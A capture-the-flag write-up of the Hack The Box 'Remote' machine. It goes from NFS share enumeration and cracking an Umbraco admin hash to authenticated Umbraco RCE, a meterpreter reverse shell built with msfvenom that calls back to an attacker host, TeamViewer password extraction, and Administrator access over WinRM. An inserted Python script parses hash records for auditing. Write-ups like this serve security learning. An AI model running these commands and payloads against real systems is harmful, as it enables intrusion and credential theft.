Remote

TL;DR

  • Mount the NFS share and find credentials to log in as admin on Umbraco (CMS)
  • Exploit RCE on Umbraco to get a shell
  • Find TeamViewer credentials and connect as Administrator with Windows Remote Management

User.txt

Reconnaissance

Let’s start with an Nmap scan:

magnussen@funcMyLife:~/remote$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN remote.txt 10.10.10.180
# Nmap 7.60 scan initiated Fri Jul 10 12:56:46 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN remote.txt remote.htb
Increasing send delay for 10.10.10.180 from 0 to 5 due to 142 out of 473 dropped probes since last increase.
Increasing send delay for 10.10.10.180 from 5 to 10 due to 181 out of 601 dropped probes since last increase.
Warning: 10.10.10.180 giving up on port because retransmission cap hit (10).
Nmap scan report for remote.htb (10.10.10.180)
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2020-07-10 12:56:46 CEST for 217s
Not shown: 53899 closed ports, 11621 filtered ports
Reason: 53899 resets and 11621 no-responses
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3         2049/udp  nfs
|   100003  2,3,4       2049/tcp  nfs
|   100005  1,2,3       2049/tcp  mountd
|   100005  1,2,3       2049/udp  mountd
|   100021  1,2,3,4     2049/tcp  nlockmgr
|   100021  1,2,3,4     2049/udp  nlockmgr
|   100024  1           2049/tcp  status
|_  100024  1           2049/udp  status
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
2049/tcp  open  mountd        syn-ack ttl 127 1-3 (RPC #100005)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49680/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 45222/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 57430/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 33056/udp): CLEAN (Failed to receive data)
|   Check 4 (port 15893/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-07-10 13:04:43
|_  start_date: 1601-01-01 00:09:21

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 10 13:00:23 2020 -- 1 IP address (1 host up) scanned in 217.56 seconds

So we find 5 useful services:

  • FTP (21)
  • IIS (80)
  • SMB (445)
  • RPCBind (2049)
  • WinRM (5985)

The website is some kind of blog.

[Screenshot: Website]

We can log in with anonymous:anonymous on the FTP server but there’s nothing interesting.

NFS

We saw a service listening on port 2049, so let’s start by listing the NFS shares on the box.

NFS (Network File System) is a file system protocol that lets a user access files over a network much like local storage. It’s built on the Open Network Computing Remote Procedure Call (ONC RPC) system.

magnussen@funcMyLife:~/remote$ showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)

Nice, we have a share called site_backups that’s available to everyone. Let’s mount it and dig into it.

magnussen@funcMyLife:~/remote$ mount -o hard,nolock remote.htb:/site_backups ./nfs_mount/
magnussen@funcMyLife:~/remote$ ls -alh nfs_mount/
total 123K
drwx------ 2 nobody    4294967294 4,0K févr. 23 19:35 .
drwxrwxr-x 4 magnussen magnussen  4,0K juil.  9 15:10 ..
drwx------ 2 nobody    4294967294   64 févr. 20 18:16 App_Browsers
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:17 App_Data
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:16 App_Plugins
drwx------ 2 nobody    4294967294   64 févr. 20 18:16 aspnet_client
drwx------ 2 nobody    4294967294  48K févr. 20 18:16 bin
drwx------ 2 nobody    4294967294 8,0K févr. 20 18:16 Config
drwx------ 2 nobody    4294967294   64 févr. 20 18:16 css
-rwx------ 1 nobody    4294967294  152 nov.   1  2018 default.aspx
-rwx------ 1 nobody    4294967294   89 nov.   1  2018 Global.asax
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:16 Media
drwx------ 2 nobody    4294967294   64 févr. 20 18:16 scripts
drwx------ 2 nobody    4294967294 8,0K févr. 20 18:16 Umbraco
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:16 Umbraco_Client
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:16 Views
-rwx------ 1 nobody    4294967294  28K févr. 20 06:57 Web.config

Cool, we have access to a backup of the website. If we dig into it, we find an interesting file: App_Data/Umbraco.sdf.

If we check its content we find some credentials:

magnussen@funcMyLife:~/remote$ head nfs_mount/App_Data/Umbraco.sdf
��V�t�t�y���Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d��׃rf�u�rf�v�rf���rf����X�v�������adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50��BiIf�hVg�v�rf�hVg����X�v�������adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f�[{"alias":"umbIntroIntroduction","completed":false,"disabled":true}]��?�g�.og���g����X�v�������smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e��?�g�Ag�.og�Og����Y�w�������ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749��~�
g�)

After cracking the hash (b8be16afba8c314ad33d812f22a04991b90e2aaa) with CrackStation we find: baconandcheese.

We can log in to http://remote.htb/Umbraco with: admin@htb.local:baconandcheese.
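The two records above also show why the admin hash fell so quickly: it is a bare 40-hex-char SHA1 with no salt, while smith’s record carries a base64 salt (16 bytes, 24 chars) followed by a base64 HMACSHA256 output (32 bytes, 44 chars). As an added example (not part of the original writeup), here is a small audit script that pulls such records out of a byte run like the `head` output and flags accounts still on the legacy scheme; the sample blob is constructed from the two records visible above, with the binary padding replaced by NUL bytes.

```python
import base64
import hashlib
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample modelled on the records in the `head Umbraco.sdf` output
# above; the binary padding between fields is replaced by NUL bytes.
SAMPLE_SDF = (
    b"\x00\x00adminadmin@htb.local"
    b"b8be16afba8c314ad33d812f22a04991b90e2aaa"
    b'{"hashAlgorithm":"SHA1"}admin@htb.localen-US\x00\x00'
    b"smithsmith@htb.local"
    b"jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts="
    b'{"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US\x00'
)
ADMIN_HASH = "b8be16afba8c314ad33d812f22a04991b90e2aaa"  # from the writeup

# Legacy record: 40 hex chars = bare SHA1 of the password, no salt at all.
LEGACY_RE = re.compile(
    rb'([0-9a-fA-F]{40})\{"hashAlgorithm":"SHA1"\}([^\x00]+?)en-US')
# Current record: base64 salt (16 bytes -> 24 chars) directly followed by
# base64 HMACSHA256 output (32 bytes -> 44 chars), as in smith's record.
SALTED_RE = re.compile(
    rb'([A-Za-z0-9+/=]{24})([A-Za-z0-9+/=]{44})'
    rb'\{"hashAlgorithm":"HMACSHA256"\}([^\x00]+?)en-US')

@dataclass
class UserHash:
    email: str
    scheme: str            # "SHA1-legacy" or "HMACSHA256-salted"
    salt: Optional[bytes]  # None for legacy records
    digest: bytes

def extract_user_hashes(blob: bytes) -> List[UserHash]:
    """Pull every recognisable password record out of a raw .sdf byte run."""
    found = []
    for m in LEGACY_RE.finditer(blob):
        found.append(UserHash(m.group(2).decode(), "SHA1-legacy", None,
                              bytes.fromhex(m.group(1).decode())))
    for m in SALTED_RE.finditer(blob):
        found.append(UserHash(m.group(3).decode(), "HMACSHA256-salted",
                              base64.b64decode(m.group(1)),
                              base64.b64decode(m.group(2))))
    return sorted(found, key=lambda r: blob.find(r.email.encode()))

def flag_legacy_accounts(records: List[UserHash]) -> List[str]:
    """Accounts to force a password reset on: their hash has no salt and is
    therefore directly searchable in precomputed SHA1 tables."""
    return [r.email for r in records if r.scheme == "SHA1-legacy"]

def legacy_sha1_matches(password: str, digest_hex: str) -> bool:
    """Show that a legacy record is nothing more than sha1(password)."""
    return hashlib.sha1(password.encode()).hexdigest() == digest_hex.lower()
```

Run against a real backup, the list returned by `flag_legacy_accounts` is the set of accounts whose passwords should be rotated and re-hashed under the salted scheme.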

RCE on Umbraco

Once we’re logged in, we find Umbraco’s version: 7.12.4.

[Screenshot: Website]

If we google for an exploit, we find the following script: https://github.com/noraj/Umbraco-RCE.

Let’s start by creating a reverse shell executable with msfvenom:

magnussen@funcMyLife:~/remote$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.158 LPORT=7777 -f exe > magnussen.exe

Let’s upload our reverse shell to the server using http://remote.htb/Umbraco#/media.

[Screenshot: Media]

Now we have to locate our file on the box and execute our reverse shell:

magnussen@funcMyLife:~/remote$ python3 exploit.py -u "admin@htb.local" -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a '-NoProfile -Command ls C:/inetpub/wwwroot/Media/1033'


    Directory: C:\inetpub\wwwroot\Media\1033


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        7/10/2020   1:31 PM          73802 magnussen.exe   

magnussen@funcMyLife:~/remote$ msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.15.158
LHOST => 10.10.15.158
msf5 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.15.158:7777
magnussen@funcMyLife:~/remote$ python3 exploit.py -u "admin@htb.local" -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a 'C:/inetpub/wwwroot/Media/1033/magnussen.exe'
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.15.158:7777
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.180
[*] Command shell session 1 opened (10.10.15.158:7777 -> 10.10.10.180:49687) at 2020-07-10 19:31:13 +0200
C:\windows\system32\inetsrv>

Yeah! We have a shell, let’s go get that user.txt.

C:\windows\system32\inetsrv> cd c:\Users\Public
c:\Users\Public>type user.txt
type user.txt
2cc0eb5c564ee64f6f01d6273d920b53

I AM ROOT

TeamViewer & WinRM

Now we just have to privesc. First of all, let’s check the running processes:

c:\Users\Public> tasklist
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0        148 K
Registry                       104                            0     23,208 K
smss.exe                       300                            0      1,220 K
csrss.exe                      408                            0      5,552 K
wininit.exe                    488                            0      6,820 K
csrss.exe                      496                            1      4,736 K
winlogon.exe                   588                            1     14,260 K
services.exe                   628                            0      9,976 K
lsass.exe                      648                            0     13,980 K
svchost.exe                    772                            0      3,756 K
svchost.exe                    796                            0     14,524 K
fontdrvhost.exe                820                            0      4,024 K
fontdrvhost.exe                828                            1      4,284 K
svchost.exe                    916                            0     10,224 K
svchost.exe                    960                            0      6,992 K
dwm.exe                        268                            1     32,976 K
svchost.exe                    564                            0      8,060 K
svchost.exe                   1032                            0      5,864 K
svchost.exe                   1092                            0     11,580 K
svchost.exe                   1156                            0      5,624 K
svchost.exe                   1224                            0     15,400 K
vmacthlp.exe                  1300                            0      6,340 K
svchost.exe                   1344                            0      7,808 K
svchost.exe                   1372                            0      7,396 K
svchost.exe                   1388                            0      5,520 K
svchost.exe                   1396                            0     11,048 K
svchost.exe                   1416                            0      9,012 K
svchost.exe                   1424                            0      7,404 K
svchost.exe                   1568                            0      5,708 K
svchost.exe                   1604                            0     14,052 K
svchost.exe                   1640                            0     11,400 K
svchost.exe                   1668                            0      8,804 K
svchost.exe                   1676                            0      8,456 K
svchost.exe                   1768                            0      8,108 K
svchost.exe                   1792                            0      8,476 K
svchost.exe                   1944                            0      6,912 K
svchost.exe                   1992                            0      7,716 K
svchost.exe                   1468                            0     15,748 K
svchost.exe                   2084                            0      8,084 K
svchost.exe                   2108                            0      8,412 K
svchost.exe                   2276                            0      7,776 K
svchost.exe                   2284                            0      7,268 K
spoolsv.exe                   2668                            0     16,268 K
svchost.exe                   2720                            0     10,736 K
svchost.exe                   2728                            0     12,284 K
svchost.exe                   2736                            0     24,904 K
svchost.exe                   2756                            0     12,324 K
svchost.exe                   2784                            0     19,920 K
inetinfo.exe                  2796                            0     17,448 K
svchost.exe                   2868                            0      6,532 K
svchost.exe                   2888                            0      8,296 K
svchost.exe                   2952                            0      6,176 K
svchost.exe                   2964                            0      5,348 K
vmtoolsd.exe                  2972                            0     18,104 K
VGAuthService.exe             2980                            0     10,264 K
svchost.exe                   3000                            0     12,240 K
svchost.exe                   3060                            0      7,364 K
TeamViewer_Service.exe        1204                            0     18,724 K
svchost.exe                   1720                            0     10,708 K
MsMpEng.exe                   2080                            0    134,228 K
svchost.exe                   2384                            0     11,668 K
svchost.exe                   3088                            0     12,584 K
nfssvc.exe                    3380                            0      5,328 K
svchost.exe                   3692                            0     12,156 K
dllhost.exe                   3396                            0     13,336 K
msdtc.exe                     4376                            0     10,440 K
WmiPrvSE.exe                  4920                            0     18,384 K
LogonUI.exe                   4936                            1     42,808 K
svchost.exe                   5872                            0      5,388 K
w3wp.exe                      5316                            0    349,928 K
svchost.exe                   1620                            0     12,044 K
svchost.exe                    992                            0     14,124 K
svchost.exe                    868                            0     13,000 K
svchost.exe                    352                            0     33,100 K
SearchIndexer.exe             1120                            0     19,932 K
svchost.exe                   2676                            0     11,528 K
svchost.exe                   1776                            0     10,168 K
svchost.exe                   2772                            0      5,864 K
svchost.exe                    816                            0      7,376 K
magnussen.exe                 1080                            0      3,724 K
cmd.exe                       2828                            0      4,748 K
conhost.exe                   2692                            0     10,840 K
WmiPrvSE.exe                  3096                            0      8,256 K
tasklist.exe                  4944                            0      7,828 K

Mmmh, the TeamViewer service might be interesting.

While searching for exploits for TeamViewer, I found this really amazing article.

We might be able to retrieve the TeamViewer password since the AES key is known; there’s even a Metasploit module for that. Let’s run it!

meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/magnussen/.msf4/loot/20200710194708_default_10.10.10.180_host.teamviewer__202492.txt
[*] <---------------- | Using Window Technique | ---------------->
[*] TeamViewer's language setting options are ''
[*] TeamViewer's version is ''
[-] Unable to find TeamViewer's process

Yes! We have the password (!R3m0te!)!

We saw earlier that WinRM is available, so let’s connect with Evil-WinRM using this password and the Administrator account.

WinRM (Windows Remote Management) is a built-in remote management protocol that allows us to execute commands remotely.

magnussen@funcMyLife:~/remote$ ./evil-winrm.rb -i 10.10.10.180 -u Administrator -p '!R3m0te!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/10/2020   1:18 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6e9e9a86aa92b84a6ebd307b78691bc6

I AM ROOT!

This was a great box, not very difficult, but I’ve learned a lot about Windows thanks to it! Thanks Mrb3n for the box!